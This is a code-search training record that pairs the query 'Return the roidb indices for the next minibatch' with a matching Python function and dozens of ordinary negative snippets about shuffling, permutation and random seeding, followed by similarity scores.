self.questions_dep_shuffled, self.questions_dep_mask_shuffled,\\\n self.pos_paths_shuffled, \\\n self.pos_paths_rel1_shuffled,self.pos_paths_rel2_shuffled, self.pos_paths_rel3_shuffled, self.pos_paths_rel4_shuffled, \\\n self.neg_paths_shuffled, \\\n self.neg_paths_rel1_shuffled, self.neg_paths_rel2_shuffled,self.neg_paths_rel3_shuffled,self.neg_paths_rel4_shuffled,\\\n self.pos_paths_words_shuffled, self.neg_paths_words_shuffled = \\\n shuffle(self.questions, self.questions_dep, self.questions_dep_mask,\n self.pos_paths,\n self.pos_paths_rel1, self.pos_paths_rel2,self.pos_paths_rel3,self.pos_paths_rel4,\n self.neg_paths_sampled,\n self.neg_paths_rel1_sampled, self.neg_paths_rel2_sampled, self.neg_paths_rel3_sampled, self.neg_paths_rel4_sampled,\n self.pos_paths_words, self.neg_paths_words_sampled)\n else:\n self.questions_shuffled, self.questions_dep_shuffled, self.questions_dep_mask_shuffled,\\\n self.pos_paths_shuffled, self.neg_paths_shuffled,self.pos_paths_words_shuffled, self.neg_paths_words_shuffled = \\\n shuffle(self.questions, self.questions_dep, self.questions_dep_mask,\n self.pos_paths, self.neg_paths_sampled,self.pos_paths_words,self.neg_paths_words_sampled)", "def shuffle(self) -> NoReturn:\n for edge_type in self.edge_types:\n for edge_class in range(self.edge_types[edge_type]):\n self.train_edges[edge_type][edge_class] = np.random.permutation(\n self.train_edges[edge_type][edge_class])\n\n self.freebatch_edge_types = {edge_type: list(range(edge_class))\n for edge_type, edge_class in self.edge_types.items()}\n self.batch_num = {edge_type: [0] * edge_class for edge_type, edge_class in\n self.edge_types.items()}\n self.took_all_edges = {edge_type: False for edge_type in self.edge_types}\n self.iter = 0", "def rand(self):\n raise NotImplementedError", "def pre_randomize(self, seed):\n super(ReseedingRandomizer, self).pre_randomize(seed)\n self.seed(seed=seed)", "def shuffle(L):\n return [L[i] for i in permutation(len(L))]", "def reset_random_prob(self):\n cache_len = 100000\n self.random_prob_cache = np.random.random(size=(cache_len,))\n self.random_prob_ptr = cache_len - 1", "def random_permutation(iterable, r = None):\n pool = tuple(iterable)\n r = len(pool) if r is None else r\n return tuple(random.sample(pool, r))", "def shuffle_chromosomes(mutated_genome):\n random.shuffle(mutated_genome)", "def PermutationTest(self):\n # U = union of B and T\n union_sample = np.concatenate((self.x_benchmark, self.x_trial), axis=0)\n n_samples = self.NB + self.NT\n \n # Initialize array of test statistic values\n self.TS_tilde = np.zeros(self.n_perm, dtype=np.float)\n \n count=0\n print(\"Running {:d} Permutations... 0%\".format(self.n_perm))\n \n # loop over different samplings\n for i in range(self.n_perm):\n \n # Print progress\n progress = int(round(((i+1)/self.n_perm)*100,0))\n progress_list = [25, 50, 75, 100]\n if count < len(progress_list) and progress == progress_list[count]:\n count+=1\n print(\"Running {:d} Permutations... {:d}%\".format(self.n_perm, progress))\n \n # Random permutations of U (sampling without replacement)\n x_resampled = shuffle(union_sample)\n # Assign first NB elements to Benchmark\n B_resampled = x_resampled[:self.NB]\n # Assign remaning NT elements to Trial\n T_resampled = x_resampled[self.NB:]\n \n # Compute the test statistic\n self.TS_tilde[i] = self.TestStatistic(B_resampled, T_resampled)", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.permutation((20,), 10))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def permutation(a):\n rs = _generator.get_random_state()\n return rs.permutation(a)", "def shuffle(self, inp: Tensor):\n _seed = self._seed() if callable(self._seed) else self._seed\n inp._reset(_shuffle(inp=inp, seed=_seed, handle=self._handle))", "def scramble_mutation(random, candidate, args):\r\n rate = args.setdefault('mutation_rate', 0.1)\r\n if random.random() < rate:\r\n size = len(candidate)\r\n p = random.randint(0, size-1)\r\n q = random.randint(0, size-1)\r\n p, q = min(p, q), max(p, q)\r\n s = candidate[p:q+1]\r\n random.shuffle(s)\r\n return candidate[:p] + s[::-1] + candidate[q+1:]\r\n else:\r\n return candidate", "def update_random_state(self):\n self.random_state = RandomState()", "def random_state(N, p):\n m = int(N * p)\n s = np.concatenate([np.ones(m), np.ones(N-m) * -1]).astype(np.int8)\n np.random.shuffle(s)\n return s", "def shuffle(self):\n self.np_random.shuffle(self.deck)", "def __init__(self, roidb, num_classes):\n self._roidb = roidb\n self._num_classes = num_classes\n self._shuffle_roidb_inds()", "def __init__(self, roidb, num_classes):\n self._roidb = roidb\n self._num_classes = num_classes\n self._shuffle_roidb_inds()", "def reset_rf_samples():\n forest._generate_sample_indices = (lambda rs, n_samples:\n forest.check_random_state(rs).randint(0, n_samples, n_samples))", "def shuffle(self): \n for x in range(12):\n self.right(primary=-60, counter=0)\n time.sleep(.1)\n self.left(primary=-60, counter=0)\n time.sleep(.1)\n self.stop()", "def ScrambleMutation(item):\n item=copy.deepcopy(item)\n countryNo = len(item)\n [start,end] = sorted(random.sample(range(1,countryNo+1),2))\n shuffle_slice(item,start,end)\n return item", "def shuffle_question(self):\n r = random.SystemRandom()\n r.shuffle(self.question_list)", "def shuffle(self):\n for edge_type in self.edge_types:\n for k in range(self.edge_types[edge_type]):\n self.train_edges[edge_type][k] = np.random.permutation(self.train_edges[edge_type][k])\n self.batch_num[self.edge_type2idx[edge_type[0], edge_type[1], k]] = 0\n self.current_edge_type_idx = 0\n self.freebatch_edge_types = list(range(self.num_edge_types))\n self.freebatch_edge_types.remove(self.edge_type2idx[0, 0, 0])\n self.freebatch_edge_types.remove(self.edge_type2idx[0, 1, 0])\n self.freebatch_edge_types.remove(self.edge_type2idx[1, 0, 0])\n self.iter = 0", "def random_weight_init(_p: Perceptron):\n\n _p.weights = [rd.choice([1-rd.random(), -1+rd.random()]) for _ in range(_p.input_size)]", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.permutation((20,), 10), updates=random.updates())\r\n\r\n fn_val0 = fn()\r\n fn_val1 = fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def trainSet(self):\r\n self.currIdx = 0\r\n random.shuffle(self.trainSamples)\r\n self.samples = self.trainSamples[:self.numTrainSamplesPerEpoch]", "def _sample_lam(self, cur_y, cur_z):\n old_loglik = self._loglik(cur_y, cur_z)\n old_lam = self.lam\n \n # modify the feature ownership matrix\n self.lam = np.random.beta(1,1)\n new_loglik = self._loglik(cur_y, cur_z)\n move_prob = 1 / (1 + np.exp(old_loglik - new_loglik));\n if random.random() < move_prob:\n pass\n else:\n self.lam = old_lam", "def shuffle_in_unison(self, x_train, y_train,split=0.1):\n n = np.size(x_train,axis=0)\n p = np.random.permutation(len(x_train))\n cutoff = int(split*n)\n p_val = p[0:cutoff]\n p_train = p[cutoff:]\n return x_train[p_train], y_train[p_train], x_train[p_val], y_train[p_val]", "def _reweight(self):\n self._seed_weights = [self._graph.degree(seed) for seed in self._seeds]\n weight_sum = np.sum(self._seed_weights)\n self._seed_weights = [float(weight)/weight_sum for weight in self._seed_weights]", "def shuffle(self):\n self.__c_elem().melange()", "def randomize(self):\r\n # first take care of all parameters (from N(0,1))\r\n x = self._get_params_transformed()\r\n x = np.random.randn(x.size)\r\n self._set_params_transformed(x)\r\n # now draw from prior where possible\r\n x = self._get_params()\r\n if self.priors is not None:\r\n [np.put(x, i, p.rvs(1)) for i, p in enumerate(self.priors) if not p is None]\r\n self._set_params(x)\r\n self._set_params_transformed(self._get_params_transformed()) # makes sure all of the tied parameters get the same init (since there's only one prior object...)\r", "def random_seed(seed):\n state = RandomState()\n random.seed(seed) # alter state\n np.random.seed(seed)\n torch.manual_seed(seed)\n yield\n state.set_global()", "def mutate_nonstructural(self):\n # TODO consider clamping weights and biases?\n for link in self.gene_links:\n # Disable/Enable links\n if event(link_toggle_prob): # Chance of toggling link\n link.enabled = True if link.enabled is False else False\n if link.enabled is False and event(link_enable_prob): # Chance of enabling a disabled link\n link.enabled = True\n # Mutate weights\n if event(weight_mutate_rate):\n if event(weight_replace_rate): # replace with random weight\n link.weight = random.uniform(weight_init_min, weight_init_max)\n else: # adjust weight\n link.weight += random.uniform(-uniform_weight_scale, uniform_weight_scale)\n for node in self.gene_nodes:\n # Mutate bias\n if event(bias_mutate_rate):\n if event(bias_replace_rate): # replace with random bias\n node.bias = random.uniform(bias_init_min, bias_init_max)\n else: # adjust bias\n node.bias += random.uniform(-uniform_weight_scale, uniform_weight_scale)\n # Mutate activation func\n if node.can_modify:\n if event(change_act_prob):\n node.act_func = self.act_set.get_random_activation_func()\n # reinit freq amp and vshift when act func changes\n if node.act_func.__name__[0] == \"g\":\n node.freq = random.uniform(-gauss_freq_range, gauss_freq_range)\n node.amp = random.uniform(-func_amp_range, func_amp_range)\n node.vshift = random.uniform(-gauss_vshift_range, gauss_vshift_range)\n elif node.act_func.__name__[0] == \"s\":\n node.freq = random.uniform(-sin_freq_range, sin_freq_range)\n node.amp = random.uniform(-func_amp_range, func_amp_range)\n node.vshift = random.uniform(-sin_vshift_range, sin_vshift_range)\n # Adjust freq amp and vshift of activation function\n if event(func_adjust_prob):\n if node.act_func.__name__[0] == \"g\":\n node.freq += random.uniform(-guass_freq_adjust, guass_freq_adjust)\n elif node.act_func.__name__[0] == \"s\":\n node.freq += random.uniform(-sin_freq_adjust, sin_freq_adjust)\n if event(func_adjust_prob):\n if node.act_func.__name__[0] == \"g\" or node.act_func.__name__[0] == \"s\":\n node.amp += random.uniform(-func_amp_adjust, func_amp_adjust)\n if event(func_adjust_prob):\n if node.act_func.__name__[0] == \"g\" or node.act_func.__name__[0] == \"s\":\n node.vshift += random.uniform(-func_vshift_adjust, func_vshift_adjust)\n # Mutate substrate width/height rectangles\n if event(width_mutate_prob):\n if event(0.5):\n self.substrate_width += 1\n elif self.substrate_width > 1:\n self.substrate_width -= 1\n if event(height_mutate_prob):\n if event(0.5):\n self.substrate_height += 1\n elif self.substrate_height > 1:\n self.substrate_height -= 1\n \"\"\" ES-HyperNeat - no longer used\n # Mutate QuadTree variance\n if event(var_mutate_prob):\n self.var_thresh += np.random.normal(scale=gauss_var_scale)\n self.var_thresh = self.var_thresh if self.var_thresh > 0 else 0\n # Mutate QuadTree band thresh\n if event(band_mutate_prob):\n self.band_thresh += np.random.normal(scale=gauss_band_scale)\n self.band_thresh = self.band_thresh if self.band_thresh > 0 else 0\n \"\"\"", "def _choose_sample(self):\n\n \t #periodically generate a new reconstruction for the purposes of sampling", "def random_permutation_sampling_sequential(model, length, context, num_samples=1, temperature=0.5, repetition_penalty=1.0,\n top_k=0, top_p=0.0, is_xlnet=False, device='cpu'):\n\n context = torch.tensor(context, dtype=torch.long, device=device)\n context = context.unsqueeze(0).repeat(num_samples, 1)\n generated = context #maybe add a for loop later\n input_ids = torch.cat((generated, torch.zeros((1, length), dtype=torch.long, device=device)), dim=1)\n\n with torch.no_grad():\n random_permutation = np.arange(input_ids.shape[1])[-length:]\n np.random.shuffle(random_permutation)\n perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float, device=device)\n perm_mask[:, :, -length:] = 1.0\n for idx, perm_idx in enumerate(random_permutation):\n perm_mask[:,:, random_permutation[:idx]] = 0.\n\n target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float, device=device)\n target_mapping[0,0, perm_idx] = 1.0\n inputs = {'input_ids': input_ids, 'perm_mask': perm_mask, 'target_mapping': target_mapping}\n outputs = model(**inputs)\n next_token_logits = outputs[0][0,:,:] / (temperature if temperature > 0 else 1.)\n for _ in set(generated.view(-1).tolist()):\n next_token_logits[:,_] /= repetition_penalty\n filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=top_k, top_p=top_p)\n if temperature == 0: #greedy sampling:\n next_token = torch.argmax(filtered_logits).unsqueeze(0)\n else:\n next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1)\n\n input_ids[:, perm_idx] = next_token[:, 0]\n\n return input_ids, random_permutation", "def _shuffle(self, reinit_indexes = False):\n print('Shuffling data...')\n # set seed for reproducibility\n #random.seed()\n # shuffle identities\n random.shuffle(self.identities)\n # shuffle images associated to each identity\n for identity in self.groundtruth_metadata.keys():\n random.shuffle(self.groundtruth_metadata[identity]['metadata'])\n if reinit_indexes:\n self.groundtruth_metadata[identity]['index'] = 0\n print('Finished shuffling data!')", "def posterior_sampler(self, nsamples, seed=0, verbose=True):\n\n import random\n\n random.seed(seed)\n sample = self.get_chain()[-self.get_tune:]\n sample = sample.reshape(-1, sample.shape[-1])\n sample = random.choices(sample, k=nsamples)\n\n return sample", "def random_permutation(iterable, r=None):\n pool = tuple(iterable)\n if r is None:\n r = len(pool)\n return list(random.sample(pool, r))", "def seed_random():\n random.seed(0)", "def _sample_seed(self):\n raise Exception(\" not implemented in base model\")", "def mutate(self, chance, amount):\r\n for layer in self.layers:\r\n for row in range(layer.output_size):\r\n for col in range(layer.input_size+1):\r\n if np.random.rand() < chance:\r\n new_val = layer.weights[row, col] + np.random.uniform(-amount, amount)\r\n new_val = min(max(-1, new_val), 1)\r\n layer.weights[row, col] = new_val", "def seed():", "def shuffle(self, return_perm=False):\n perm = torch.randperm(len(self))\n dataset = self.index_select(perm)\n return (dataset, perm) if return_perm is True else dataset" ]
[ "0.7341957", "0.6980299", "0.6517204", "0.6517204", "0.64934677", "0.64483047", "0.6303886", "0.6292093", "0.6292093", "0.626896", "0.61837375", "0.61757475", "0.6172573", "0.6138042", "0.61206377", "0.6080488", "0.6078871", "0.6064974", "0.59135115", "0.59126294", "0.5903226", "0.5892479", "0.5876207", "0.58738816", "0.58374935", "0.5809452", "0.5807619", "0.5781552", "0.5739598", "0.5731684", "0.571783", "0.57064295", "0.5702457", "0.56808406", "0.567266", "0.5656318", "0.5631844", "0.56245595", "0.5620422", "0.56138355", "0.56106174", "0.5607577", "0.5606569", "0.5602816", "0.5595942", "0.55915755", "0.55787855", "0.5567519", "0.5556755", "0.55527246", "0.5549788", "0.5540681", "0.55388415", "0.5538694", "0.5522875", "0.55211127", "0.55171037", "0.5514125", "0.5510058", "0.54922324", "0.54895866", "0.5488043", "0.5487523", "0.5485808", "0.5483452", "0.5482916", "0.5479271", "0.5475669", "0.5471346", "0.54682356", "0.546802", "0.5452954", "0.54516566", "0.5446327", "0.5446327", "0.54457927", "0.5444331", "0.5440252", "0.54400563", "0.5430805", "0.54298764", "0.54289883", "0.54283684", "0.5422727", "0.54204017", "0.54179686", "0.5416453", "0.5410083", "0.5407443", "0.5404178", "0.5399556", "0.53966933", "0.5390906", "0.53884965", "0.5384516", "0.53758454", "0.5368644", "0.536554", "0.53653383", "0.5364254" ]
0.65922296
2
Return the roidb indices for the next minibatch.
def _get_next_minibatch_idx(self): if self.cur + self.batch_size >= self.num_images: self._shuffle_roidb_idx() db_idx = self.perm[self.cur:self.cur + self.batch_size] self.cur += self.batch_size return db_idx
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_next_minibatch_inds(self):\n ## 实际上只需要向后遍历一个即可\n\n if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):\n self._shuffle_roidb_inds()\n self._cur = 0\n\n db_inds = self._perm[self._cur : self._cur+ cfg.TRAIN.IMS_PER_BATCH]\n self._cur += cfg.TRAIN.IMS_PER_BATCH\n return db_inds", "def _get_next_minibatch_inds(self):\r\n \r\n \r\n # We use a deque and always take the *first* IMS_PER_BATCH items\r\n # followed by *rotating* the deque so that we see fresh items\r\n # each time. If the length of _perm is not divisible by\r\n # IMS_PER_BATCH, then we end up wrapping around the permutation.\r\n db_inds = [self._perm[i] for i in range(IMS_PER_BATCH)]\r\n self._perm.rotate(-IMS_PER_BATCH)\r\n self._cur += IMS_PER_BATCH\r\n if self._cur >= len(self._perm):\r\n self._shuffle_roidb_inds()\r\n return db_inds", "def _get_next_minibatch_inds(self,isTrain=True):\n if isTrain:\n if cfg.TRAIN.HAS_RPN:\n if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):\n self._shuffle_roidb_inds()\n\n db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]\n self._cur += cfg.TRAIN.IMS_PER_BATCH\n else:\n # sample images\n db_inds = np.zeros((cfg.TRAIN.IMS_PER_BATCH), dtype=np.int32)\n i = 0\n while (i < cfg.TRAIN.IMS_PER_BATCH):\n ind = self._perm[self._cur]\n num_objs = self._roidb[ind]['boxes'].shape[0]\n if num_objs != 0:\n db_inds[i] = ind\n i += 1\n\n self._cur += 1\n if self._cur >= len(self._roidb):\n self._shuffle_roidb_inds()\n else:\n if self._cur + cfg.TRAIN.IMS_PER_BATCH < len(self._roidb):\n db_inds = range(len(self._roidb))[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]\n self._cur += cfg.TRAIN.IMS_PER_BATCH\n else:\n print 'Done evaluating all testing data, now check the last shown accumulated confusion matrix as the final result.'\n sys.exit()\n\n return db_inds", "def _get_next_minibatch_inds(self):\n img_next = self._cursor[0].next()\n msk_next = self._cursor[1].next()\n if img_next and msk_next:\n pass\n else:\n print 'BlobFetcher to begin because of cursor point to end.'\n self._cursor = [self._txn[0].cursor(), self._txn[1].cursor()]\n self._cursor[0].next()\n self._cursor[1].next()", "def get_next_minibatch(self):\r\n valid = False\r\n while not valid:\r\n db_inds = self._get_next_minibatch_inds()\r\n minibatch_db = [self._roidb[i] for i in db_inds]\r\n blobs, valid = minibatch.get_minibatch(minibatch_db)\r\n return blobs", "def _get_next_minibatch(self,isTrain=True):\n db_inds = self._get_next_minibatch_inds(isTrain=isTrain)\n minibatch_db = [self._roidb[i] for i in db_inds]\n return get_minibatch(minibatch_db, self._num_classes)", "def run_idxs(self):\n return list(range(len(self._h5[RUNS])))", "def _next_index(self):\n # Cache a string of random numbers to speed things up\n if not self.rnd_pool_:\n self.rnd_pool_ = self.rnd.randint(0, self.input_size - 1, self.batch_size * 10).tolist()\n\n return self.rnd_pool_.pop()", "def getBreakIndices(self):\n for i in self.raw.index[:-1]:\n if self.raw['stress'][i+1] > self.raw['stress'][i] and \\\n self.raw['stress'][i+2] < self.raw['stress'][i+1]:\n brkIdx1 = i+1 # brkIdx1: start of the first unloading\n break\n if self.reloading:\n for i in self.raw.index[brkIdx1+1:-1]:\n if self.raw['stress'][i+1] < self.raw['stress'][i] and \\\n self.raw['stress'][i+2] > self.raw['stress'][i+1]:\n brkIdx2 = i+1 # brkIdx2: end of the first unloading\n break\n # brkIdx3: Point on the NCL after the first reloading\n brkIdx3 = self.raw.query(f'stress == stress[{brkIdx1}]').index[1]\n # brkIdx4: index of the last point on the NCL\n brkIdx4 = self.raw.query('stress == stress.max()').index[0]\n self.secondUnloading = False\n else:\n brkIdx2 = self.raw.index[-1]\n brkIdx3 = None\n brkIdx4 = None\n\n self.brkIdx1 = brkIdx1\n self.brkIdx2 = brkIdx2\n self.brkIdx3 = brkIdx3\n self.brkIdx4 = brkIdx4\n return", "def get_minibatch(self):\n if self.count < self.agent_history_length:\n raise ValueError('Not enough memories to get a minibatch')\n \n self._get_valid_indices()\n \n for i, idx in enumerate(self.indices):\n self.states[i] = self._get_state(idx - 1)\n self.new_states[i] = self._get_state(idx)\n \n return np.transpose(self.states, axes=(0, 2, 3, 1)), self.actions[self.indices], self.rewards[self.indices], np.transpose(self.new_states, axes=(0, 2, 3, 1)), self.terminal_flags[self.indices]", "def _get_next_minibatch(self):\n images = np.zeros((self._batch_size, 3, self._crop_h, self._crop_w), dtype=np.float32)\n masks = np.zeros((self._batch_size, 1, self._crop_h, self._crop_w), dtype=np.float32)\n\n shuffled_batch = np.arange(self._batch_size)\n np.random.shuffle(shuffled_batch)\n for batch_index in shuffled_batch:\n blob_queue = self._blob_queue.get()\n images[batch_index, :, :, :] = blob_queue[0]\n masks[batch_index, :, :, :] = blob_queue[1]\n\n return [images, masks]", "def indices(self):\n return self._kbounded_partitions", "def next_run_idx(self):\n return self.num_runs", "def _get_batches_starting_indexes(self):\n\n indexes = numpy.arange(0, self.num_frames, self.recurrence)\n indexes = numpy.random.permutation(indexes)\n\n # Shift starting indexes by self.recurrence//2 half the time\n if self.batch_num % 2 == 1:\n indexes = indexes[(indexes + self.recurrence) % self.num_frames_per_proc != 0]\n indexes += self.recurrence // 2\n self.batch_num += 1\n\n num_indexes = self.batch_size // self.recurrence\n batches_starting_indexes = [indexes[i:i+num_indexes] for i in range(0, len(indexes), num_indexes)]\n\n return batches_starting_indexes", "def master_ndindex(self): # itermaster_indices(self):\n return itertools_product(\n *[range(*r) for r in self.location]\n ) # TODO check", "def get_minibatch(roidb):\n # We collect blobs from each image onto a list and then concat them into a\n # single tensor, hence we initialize each blob to an empty list\n blobs = {k: [] for k in get_minibatch_blob_names()}\n\n # Get the input image blob\n im_blob, im_scales = _get_image_blob(roidb)\n blobs['data'] = im_blob\n\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster/Mask R-CNN\n valid = roi_data.rpn.add_rpn_blobs(blobs, im_scales, roidb)\n elif cfg.RETINANET.RETINANET_ON:\n raise NotImplementedError\n else:\n # Fast R-CNN like models trained on precomputed proposals\n valid = roi_data.fast_rcnn.add_fast_rcnn_blobs(blobs, im_scales, roidb)\n return blobs, valid", "def _next_minibatch(self):\n batch = self.data[self.ix:self.ix+self.batch_size]\n if len(batch) < self.batch_size:\n random.shuffle(self.data)\n self.ix = self.batch_size - len(batch)\n batch += self.data[:self.ix]\n else:\n self.ix += self.batch_size\n self.batch = batch", "def get_raster_ids(self):\n return numpy.array(range(self._lo_atom, self._lo_atom + self._n_atoms))", "def get_minibatches_idx(n, minibatch_size, shuffle=False):\n\n idx_list = numpy.arange(n, dtype=\"int32\")\n\n if shuffle:\n numpy.random.shuffle(idx_list)\n\n minibatches = []\n minibatch_start = 0\n for i in range(n // minibatch_size):\n minibatches.append(idx_list[minibatch_start:\n minibatch_start + minibatch_size])\n minibatch_start += minibatch_size\n\n if (minibatch_start != n):\n # Make a minibatch out of what is left\n minibatches.append(idx_list[minibatch_start:])\n\n return zip(range(len(minibatches)), minibatches)", "def get_minibatches_idx(n, minibatch_size, shuffle=False):\n\n idx_list = np.arange(n, dtype=\"int32\")\n\n if shuffle:\n random.shuffle(idx_list)\n\n minibatches = []\n minibatch_start = 0\n for i in range(n // minibatch_size):\n minibatches.append(idx_list[minibatch_start:\n minibatch_start + minibatch_size])\n minibatch_start += minibatch_size\n\n if (minibatch_start != n):\n # Make a minibatch out of what is left\n minibatches.append(idx_list[minibatch_start:])\n\n return zip(range(len(minibatches)), minibatches)", "def batch_indices(self):\n b = self.batch_size\n return [np.arange(i*b, i*b+b) for i in range(self.num_batches)]", "def getBatch(self, n, rng, dataset):\n pmax = self._root.priority\n step = pmax / n\n indices = np.zeros(n, dtype='int32')\n for i in range(n):\n p = rng.uniform(i*step, (i+1)*step)\n node = self.find(p)\n index = self._checkTerminal(node.position, dataset)\n if (index >= 0):\n indices[i] = index\n else:\n return np.zeros(0)\n\n return indices", "def get_pulling_indices(self, weight):\n pass", "def get_minibatches_idx(n, minibatch_size, shuffle=False):\n\n idx_list = range(n)\n\n if shuffle:\n random.shuffle(idx_list)\n\n minibatches = []\n minibatch_start = 0\n for i in range(n // minibatch_size):\n minibatches.append(idx_list[minibatch_start:\n minibatch_start + minibatch_size])\n minibatch_start += minibatch_size\n\n if (minibatch_start != n):\n # Make a minibatch out of what is left\n minibatches.append(idx_list[minibatch_start:])\n\n return zip(range(len(minibatches)), minibatches)", "def get_indexes(self, dataset):\n\n for i in range(self.max_iters):\n index = random.randint(0, len(dataset))\n gt_bboxes_i = dataset.get_ann_info(index)['bboxes']\n if len(gt_bboxes_i) != 0:\n break\n\n return index", "def _raveled_index(self):\n return np.r_[:self.size]", "def _raveled_index(self):\n return np.r_[:self.size]", "def starting_values(self, resids: NDArray) -> NDArray:", "def get_refresh_ids(self):\n ids = []\n for bucket in self.router.lonely_buckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids", "def ring_idx(self) -> int:\n return self._ring_idx", "def job_ids(self):\n return self.connection.lrange(self.key, 0, -1)", "def getRefreshIDs(self):\n ids = []\n for bucket in self.router.getLonelyBuckets():\n rid = random.randint(*bucket.range).to_bytes(20, byteorder='big')\n ids.append(rid)\n return ids", "def indices(self):\n return range(len(self))", "def get_next_bin_nodes(self, n):\n # Implemented from template for osid.resource.ResourceList.get_next_resources\n return self._get_next_n(n)", "def minibatch(self, size):\n indexes = self.sample(size)\n\n pre_states = np.array([self.get_state(index) for index in indexes], dtype=np.float32)\n post_states = np.array([self.get_state(index + 1) for index in indexes], dtype=np.float32)\n actions = self._actions[indexes]\n rewards = self._rewards[indexes]\n dones = self._terminals[indexes]\n\n return pre_states, actions, post_states, rewards, dones", "def get_training_index():\n return list(range(0, 305))", "def get_shuffle_ids(self, bsz):\n forward_inds = torch.randperm(bsz).long().cuda()\n backward_inds = torch.zeros(bsz).long().cuda()\n value = torch.arange(bsz).long().cuda()\n backward_inds.index_copy_(0, forward_inds, value)\n return forward_inds, backward_inds", "def get_rep_mol_indexes():\n f = open(FILE_WITH_REP_MOL_IDXS, \"r\")\n rd = csv.reader(f)\n mols = rd.next()\n f.close()\n mol_idxs = [int(i) - 1 for i in mols]\n os.unlink(FILE_WITH_REP_MOL_IDXS)\n return mol_idxs", "def create_minibatch(self):\r\n if self.experience_batch.shape[0] <= self.minibatch_size:\r\n self.minibatch = self.experience_batch\r\n\r\n else:\r\n ind = np.random.randint(self.experience_batch.shape[0], size=self.minibatch_size) # same sample can be in the minibatch multiple times --> problem for algorithm ?\r\n self.minibatch = self.experience_batch[ind]", "def _repl_iterator(self, nodename):\n\n return (self._hash(\"%s:%s\" % (nodename, i))\n for i in xrange(self.replicas))", "def _repl_iterator(self, nodename):\n\n return (self._hash(\"%s:%s\" % (nodename, i))\n for i in xrange(self.replicas))", "def _get_split_indices(self):\n\n cumsum = np.cumsum(\n np.concatenate((np.array([0], dtype=np.int8), self.split_sizes)))\n \n fold_inds = np.array(\n [(cumsum[n], cumsum[n + 1]) for n in range(self.n_splits)])\n\n return fold_inds", "def next_batch(self):\n assert self.has_next_batch()\n start, end = self.current_index, self.current_index + self.batch_size\n current_indices = self.indices[start:end]\n img_files = self.img_files[current_indices]\n if self.is_train: \n anchor_files = self.anchor_files[current_indices]\n self.current_index += self.batch_size\n return img_files, anchor_files\n else:\n self.current_index += self.batch_size\n return img_files", "def get_active_register_indices(self):\n assert self.sketch.ndim == 1, 'Currently only support 1-dimensional sketch.'\n return np.flatnonzero(self.sketch)", "def forward(self):\n blobs = self._get_next_minibatch()\n return blobs", "def train_batch_idx(self) -> int:\n return self._train_batch_idx", "def get_next_batch_start(self):\n return None", "def _get_replay_buffer_filled_indices(self, replay_buffers, actor_index):\n # We know that the reservoir value > 0 if it's been filled, so check for entries where it == 0\n buffer_indicator = replay_buffers['reservoir_val'][actor_index].squeeze(1)\n replay_indices = np.where(buffer_indicator != 0)[0]\n return replay_indices", "def index(self):\n return self._epochs_completed * self._size + self._index_in_epoch", "def get_next_bin(self):\n # Implemented from template for osid.resource.ResourceList.get_next_resource\n return self.next()", "def __get_random_indices(self):\n rand_row = random.randint(0, self.__row_count - 1)\n rand_col = random.randint(0, self.__col_count - 1)\n return [rand_row, rand_col]", "def getStarts(self) -> List[int]:\n ...", "def get_active_ranks(self,fine=False):\n \n if fine:\n nqpt = self.nqpt_fine\n else:\n nqpt = self.nqpt\n \n #max_nqpt_per_worker = (self.nqpt // size\n # + min(self.nqpt % size, 1))\n #n_active_workers = (self.nqpt // max_nqpt_per_worker\n # + min(self.nqpt % max_nqpt_per_worker, 1))\n max_nqpt_per_worker = (nqpt // size\n + min(nqpt % size, 1))\n n_active_workers = (nqpt // max_nqpt_per_worker\n + min(nqpt % max_nqpt_per_worker, 1))\n return np.arange(n_active_workers)", "def get_slots(self) -> int:", "def _compute_relative_leaderboard_indexes(ranking, size):\n if ranking == 0 or ranking == 1:\n return (0, 5)\n elif ranking == size or ranking == size-1:\n return (max(0, size-5), size)\n else:\n return (max(0, ranking-2), max(size, ranking+3))", "def __next__(self):\n if self.cur_batch_id >= self.n_batches:\n self.cur_batch_id = 0\n raise StopIteration\n else:\n start = int(np.sum(self.batch_size_B[:self.cur_batch_id]))\n stop = start + int(self.batch_size_B[self.cur_batch_id])\n cur_batch_tuple = (\n self.u[start:stop],\n self.v[start:stop],\n self.rating[start:stop])\n self.cur_batch_id += 1\n return cur_batch_tuple", "def sample_idxs(self, batch_B, batch_T):\n t, b, f = self.t, self.off_backward + batch_T, self.off_forward\n high = self.T - b - f if self._buffer_full else t - b - f\n T_idxs = np.random.randint(low=0, high=high, size=(batch_B,))\n 